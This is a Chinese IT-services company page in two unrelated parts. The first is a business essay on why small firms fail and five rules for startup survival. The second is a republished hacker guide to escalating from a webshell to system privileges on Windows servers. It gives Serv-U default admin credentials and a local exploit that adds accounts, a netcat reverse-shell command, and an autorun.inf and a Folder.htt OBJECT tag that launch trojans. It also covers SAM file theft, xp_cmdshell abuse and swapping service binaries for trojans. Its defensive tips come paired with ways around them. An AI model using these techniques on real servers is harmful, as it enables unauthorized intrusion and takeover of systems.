艾銻知識 | 服務器 提權方法大全
2020-03-10 15:13 作者:艾銻無限 瀏覽量:
中小微企業生存的五大法則
為什么中小微企業的存活率這么低呢?
第一,創業失敗創始人難辭其咎,我們在學校里是沒有一堂課是教如何創業,如何才能創業成功,即使現在有很多大學嘗試著在學校開辦一些創業的課程,也不系統,更不專業,因為創業是一件極其復雜的工作,是需要多項技能的集合以及熟練的運用才有可能應對突如其來的變化,創業初期就像一艘孤獨的小船面對波濤洶涌的大海,但船長從來都沒有開過任何一艘船駛出過海港,風浪來的時候,只有慌張和恐懼,最后被海水吞沒.
第二,創業失敗是價值觀不統一,方向不一致,團隊不團結,風平浪靜,風和日麗,其實沒什么關系,大家都在享受陽光帶來的美好和快樂,只有遇到風浪,生死攸關或個人利益受到極大沖突時,人性的弱點才會突顯,當每個人只盯著個人得失或眼光短淺時,如果這個時候創始人沒有力挽狂瀾,強大的信念和人格魅力來一統所有人的行動準則,在危機中遲疑,就等于在死神面前跳舞,當年阿里的“中國供應商”客戶涉嫌欺詐事件,如果不是馬云明察秋毫,當即立斷,我相信也不會有今天阿里世界霸主的地位.
第三,創業失敗是固步自封,看不見高山,如果我們只能看見自己的山最高,沒有走出去,沒有學習的心態,沒有敬畏之心,很快時代就會把我們淘汰,當年的諾基亞,柯達就是最好的例子.無論企業多大,都要有一顆創業的心,永遠相信還能做的更好,還可以再創新,還會想出其它的可能性.真正的對手不在外面,而在我們心中,心中無敵,才能無敵于天下.
第四,創業失敗是誤解了”客戶是上帝”,上帝并不是時時都知道自己要什么,我們不能只限于客戶表面的表達就決定了他們的需求,很多企業死就死在客戶的假需求中,看起來好像是客戶追求的產品,需要的服務,但實際當產品生產出來,當服務送到客戶面前,并沒有真正吸引到客戶的注意,愿意為此而買單,核心本質就是我們曲解了”客戶是上帝”這句話,真正的上帝是不會當自己是至高無上的,也不會對品質無底限的追求,更不會對服務沒有節制要求,其實客戶就是客戶,他們絕大部分人都是普通人,有著普通人的欲望,有著普通人的不滿足,有著普通人想要花更少的錢卻要得到更多的意識,他們的只忠誠于更便宜更高的品質,這一切都是企業需要認知到的本質,不然你的”上帝”是不會為你持續付費的.
第五,創業失敗是講多了人情講少了制度,公司小,三五個人可以不需要任何制度,甚至也不需要任何系統,因為那時彼此聯結非常深,情感的能量可以喚醒每個人的斗志和決心 ,但當企業發展到幾十個人甚至幾百個人時,那種深深的聯結感很難在感受到,人性的弱點就會被環境所喚醒,就會被利益所綁架,就會被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最終是服務于人,只有促進發展的制度,可能激勵人性向善的制度才能長久, 反之亦然.
如果你想想創立一家公司?
如果你是一家剛剛開始創業的公司?
如果你現在在創業的過程中遇到了挑戰?
結合上面的五大常見創業失敗,我們總結出來了五個可以讓你有更大成功機率的法則,可以讓你活的更久一些,但不保證你一定成功,因為事事變化,因緣和合,萬法無常,只能隨機而變.
第一法則:準備自己
創始人需要自我審視,首先要準備好自我犧牲的精神,要做好大海有風暴的思想準備,其次利用一切可以實踐的機會去鍛煉自己的綜合能力,不僅僅相信前輩和書本的聲音,更需要相信實戰后帶來的思考和反思.即要有遠大的理想和抱負,又要有腳踏實地做好每一件事的決心.
第二法則:認識自我
創始人要極早的認識自我,想清楚為什么要創業比創業更重要,清晰明確的了解自己的價值是什么?什么是自己會堅持的,什么是自己抗拒的,混亂的價值觀就會吸引五花八門的人,企業內部的斗爭都是創始人自己思想的斗爭,初創企業所呈現出來的一切現象都是創始人內在的顯化.當年阿里快速成長,內部也出現了一系列的問題,但極其智慧的馬云沒有去解決這些問題,反而把自己關在道觀中整整7天,最后終于想明白了三個問題:我要什么,我有什么,我要放棄什么,當他想清晰這三個問題后,并向全公司傳遞出來,最后所有那些紛繁復雜的問題都不解自明.
第三法則:持續打開
創始人的天花板就是企業的天花板,企業無法突破,就是創始人沒有突破自己,突破其實不容易,因為固有的觀念就像萬里長城一樣,非一日之功,是多少個春夏秋冬,嚴寒酷暑的積累和沉淀,這些不是沒有價值,而是幫助過我們創了價值,讓我們來到了今天這一步,但如果我們期望有一個更大的世界,就需要放下它們,放下我們曾經一直的堅持和執著,打開自己,讓自己接納一個全新的可能性,也許過不了多久,我們又會把這些新的東西奉為圭臬但只要我們還想看到一個更大的可能性,就需要再次打開自己,重新建立認知,我們一生都是在打開和重建過程中,直到生命的終結,又一切回歸原點.
第四法則:回歸本質
創始人剛開始需要和團隊一起參與戰斗,甚至做具體細節工作,因為初創需要激情來點燃,而創始人是這個團隊最有激情的一個人,初創團隊需要有人帶動去點燃更大的燃料.當所有團隊和部門走向正軌時,創始人更大的價值是深度的思考,有效的區分,精神的引領和正確的選擇.
企業越來越大,事情就會越來越多,如果沒有一個清醒的大腦保持深度的思考,就像讓企業很多人很忙,忙是一種現象,并不代表有價值,只有透過深度思考發現事物的本質,才知道忙什么才是最重要的,
懂得有效的區分是一個領導者必須掌握的能力, 《尼布爾的祈禱文》說:”上帝,請賜予我平靜,去接受我無法改變的。給予我勇氣,去改變我能改變的,賜我智慧,分辨這兩者的區別。”只有具備分辨的智慧,才不會讓自己誤入歧途.
創始人要有強大的精神力量,讓所有員工感受到這股力量,因為所有的成功都離不開一個偉大的精神領袖,就像蘋果的喬布斯,微軟的比爾蓋茨和阿里的馬云.
選擇比努力更重要,這句話告訴我們順勢而為的選擇可以讓我們在同樣的努力情況下獲得不同的結果,如何才能具備這樣明智選擇的能力呢,強大的深度思考能力和有效的區分能力就可以幫到我們看見正確的選擇.
第五法則:創造系統
創始人是人,是人就會有七情六欲,就會有生老病死,就會有悲歡離合,這些人性的因素會讓我們很不穩定,但企業能持久有效的運轉一定是在穩定的能量下運行,所以不能始終靠人來推動,企業想要活的久一定是有內生的系統,只有建立一個自動運轉的系統才能保持穩定健康的成長.
艾銻知識 |服務器 提權方法大全
現在可以說網絡管理員對服務器的設置是越來越BT,但BT的同時,也有黑客朋友們對服務器的不斷的測試,在測試中往往獲取最低的guest權限是簡單的,像我們在入侵網站過程中,獲取webshell是簡單的,但是當由webshell的guest權限向system權限提升時卻往往是止步不前。所以我有想寫這樣一篇文章的想法,但是在思考的過程中,又不得不承認,方法是不斷的探索中出來的,方法更是有常規的也有另辟蹊徑的。下面就做一些簡單的介紹,對提權的方法進行一些介紹,同時也希望在更多朋友的不斷回復中能夠豐富我們的方法。
首先要說明的是,過早的一些漏洞我們就不再多說了,只說一些現在可以見到的吧。還有就是本文的題目是webshell下的服務器提權方法。
下面我們就進入主題,對webshell的提權方法!
首先我們要明確的是,提權一般是依靠主機所開通的服務,利用服務存在的漏洞和管理員設置的疏忽進行提權的,不過也不排除一些SB的管理員對服務器設置的似乎沒有"穿衣服".下面就是針對一些常見的服務進行的提權方法。
在獲取webshell后,我們常見的是看一下系統的服務,查看服務可以通過利用掃描器對服務器ip進行掃描,或是在webshell中有執行dos命令時查看net start來查看主機所開放的服務。首先我們說一下從簡單的開始說起:
1。pcanywhere的提權方法
pcanywhere軟件我想大家都了解,為什么將它放在首位就是因為讀取密碼后直接連接就可以了,如果對方主機在開通了pcanywhere的服務端的話,我們看能否跳轉到這個目錄C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下載它的CIF文件,然后使用pcanywhere的密碼讀取器得到pcAnywhere密碼,然后使用pcanywhere登陸即可!接下來就是可視化操作了。
2。Serv-U提權方法
Serv-u可以說是網絡上比較火的一款FTP服務器軟件,有許多像我這樣的小黑們都是看系統服務中是否有Serv-u的系統進程來進行提權的。Serv-u的提權方法針對不同的版本也有不同的方法,這里我們就列舉一二,可能不是很全,但在其他網友的回復中能夠不斷的補充吧!
a.serv-U本地提權:serv-U本地提權一般是利用溢出程序對serv-u的設置上的缺陷進行添加超級賬戶的功效。例如Xiaolu寫的serv-u.exe就是利用sevr-u的默認管理端口,管理員賬號和密碼進行提權的,默認本地管理端口是:43958,默認管理員:LocalAdministrator,默認密碼:#l@$ak#.lk;0@P,這是集成在Serv-u內部的,可以以Guest權限來進行連接,對Serv-u進行管理,利用本地提權的關鍵就是尋找服務器文件目錄中的everyone權限目錄,下面我給大家列舉些常見的everyone權限目錄:
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多時候沒作限制,把提升權限的工具上傳上去,然后執行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\Documents\
很多時候data目錄不行,試試這個很多主機都是erveryone 完全控制!
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服務器支持PHP)
c:\PHP(如果服務器支持PHP)
上面一些目錄就是常見的,不過也不排除一些特殊的,像江民的kv2004對文件夾的權限設置就不是很嚴格的。
不過針對本地提權是可以防范的,下面是我在xiaolu的文章中節選的:
防止辦法和對策:
一般防止方法:設置目錄權限,通過去掉Web目錄iusr用戶的執行權限來防止使用Webshell來運行Exp程序。
對策:這種方法有一定的局限性,需要設置的目錄很多,不能有一點疏漏,比如我就發現很多虛擬主機在C:\Documents and Settings\All Users\ Documents目錄以及下邊幾個子目錄Documents沒有設置權限,導致可以在這個目錄上傳并運行Exp,這種目錄還有x:\php,x:\perl等,因為這種目錄都是
everyone完全控制的。有些主機還支持php,pl,aspx等,這簡直就是服務器的Serv-U災難,^_^,運行程序更加方便。
高級一點的防止辦法:修改Serv-u管理端口,用Ultraedit打開ServUDaemon.exe查找B6AB(43958的16進制),替換成自己定義的端口比如3930(12345),打開ServUAdmin.exe找到最后一個B6AB替換成3930(12345),啟動Serv-u,現在本地管理端口就成了12345了:
TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
對策:對付這種也很簡單,netstat –an,就能看到端口了,有人說netstat無法運行,其實你再上傳個netstat.exe到可執行目錄運行就ok了,然后修改一下Exp編譯,上傳運行就好了,我修改了一個可以自定義端口的Exp,運行格式:
USAGE: serv-u.exe port "command"
Example: serv-u.exe 43958 "net user xl xiaoxue /add"
更高級的防止辦法:修改管理員名和密碼,用Ultraedit打開ServUDaemon.exe查找Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,修改成等長度的其它字符就可以了,ServUAdmin.exe也一樣處理。
對策:這下默認的管理員連接不上了,還有辦法么?嘿嘿,有的管理員安裝Serv-u都是使用默認目錄C:\Program Files\Serv-U安裝,這個目錄雖然不能寫,也不能修改,但是默認iusr是可以讀的,我們可以用webshell來下載ServUDaemon.exe,用Ultraedit打開分析一下,Serv-U的帳號密碼就到手
了,修改Exp編譯上傳運行,我們又勝利了。
終極防御:
a.設置好目錄權限,不要疏忽大意;
b.Serv-U最好不要使用默認安裝路徑,設置Serv-U目錄的權限,只有管理員才能訪問;
c.用我介紹的辦法修改Serv-U的默認管理員名字和密碼,喜歡的話端口也可以改掉。
d.serv-U管理端口定向轉發法:這里需要使用的工具是FPipe.exe
我們要知道Serv-u默認本地管理端口是:43958,這個是只允許本地ip127.0.0.1進行登陸和管理的,那么我們就想能不能通過端口轉向來遠程管理呢?所以我們用到FPipe.exe,首先是將FPipe.exe上傳至服務器中,然后再cmd下執行
Fpipe.exe -v -l 12345-r 43958 127.0.0.1
這里要說明的是,這段字符的意思是當訪問12345端口時就會自動轉向43958端口,也就是serv-u的管理端口
所以我們在本地安裝一個Serv-u,
新建一個服務器,填入對方IP,
user:
LocalAdministrator
pass:
#l@$ak#.lk;0@P
連接上后你就可以管理他的Serv-u了,剩下的操作就是執行上面提到的方法了!
===================================================
Serv-U的方法我就總結出這幾個來,可能還有其他的方法我沒有看到吧
不過個人認為關鍵還是本地溢出漏洞的應用要比較多一些,所以網上也常常出現serv-u的本機溢出程序
不同版本的更是層出不窮,前一段時間針對serv-u6.0.2的修改了默認管理員賬號和密碼的相關文章還請大家參照校園黑客聯盟的小魚修煉中的文章。
Serv-U的提權文章就暫時先總結到這里,有更好的方法還請大家回復!
3.Autorun方法:這種方法也可以說是比較古老的方法,最初應該是從光盤自動播放中尋找到的靈感吧?不進行細說,給出格式即可
制作一個Autoruan.inf文件.內容如下
[AutoRun]
open=bear.exe
bear.exe為木馬程序,與autorun.inf放在同一目錄下!
4。SAM破解方法: 進入C:\WINNT\system32\config\ 下載他的SAM文件用lc等破解工具破解。
5。相關腳本提權方法:前面的serv-u的ftp提權中提過的vbs這里再說下.進入c:\Documents and Settings\All Users\「開始」菜單\程序\啟動 寫入bat或vbs文件。這種方法也是屬于守株待兔類的,只有在對方主機重起以后才可以達到目的。
6。NC的反彈提權:這里就要說NC的相關用法了,如果在對方服務器中有足夠的權限執行nc的話就好了,把它反彈到自己的電腦上,你就可以進行相關操作了!瑞士軍刀具體方法不多說,給出格式,如下:
server:nc -e cmd.exe ip 1234
client: nc -l -p 1234
7。conn等asp文件中泄漏SQL帳戶密碼方法:這種方法說起來應該算是比較僥幸的方法。曾經馬俊和我說過一次,原來沒有太在意,現在還真的感覺有些好用了,找到賬號密碼和數據庫名在對方沒有刪除xp_cmdshell條件下用sql連接工具連接即可,連接上后就可以輸入你想要的CMD命令了。
8。VNC的相關提權:VNC也是一個類似pcanywhere的遠程管理軟件,在linux應用廣泛,曾經在看臺灣的一些服務器中有很多使用VNC的,方法也是我在網絡中學到的,不過在應用中就成功過一次,比較郁悶!方法就轉載一下吧,網址:http://www.hxhack.org/Article/HTML/14184.html
還有要補充的就是vnc是可以反向連接的,這個方法我沒有試過,只是曾經看影子做過一個視頻動畫。
9。desktop.ini與Folder.htt方法。(此方法是在網絡看到的)方法如下:首先建立一個文件夾,進入,在空白處點右鍵,選擇“自定義文件夾”一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder
setting的文件架與desktop.ini的文件,如果看不到,就把顯示所有文件給選上,然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木馬名”></OBJECT> 然后你將
你的木馬文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的木馬,此方法也屬于類似autorun的守株待兔方法。
10。替換服務提權:我認為比較復雜,不過有些時候也實用,首先是看服務進程,在看我們是否有執行命令的權限,這里要用到的命令是rename,相關用法:
C:\>rename /?
重命名文件。
RENAME [drive:][path]filename1 filename2.
REN [drive:][path]filename1 filename2.
例如替換c:\kv2004\kv.exe的進程
rename c:\kv2004\kv.exe bear.exe
然后再將我們的本地木馬文件命名為kv.exe上傳到c:\kv2004\目錄下,等待對方重新起動機算機即可!
相關文章
IT電腦維護外包
關閉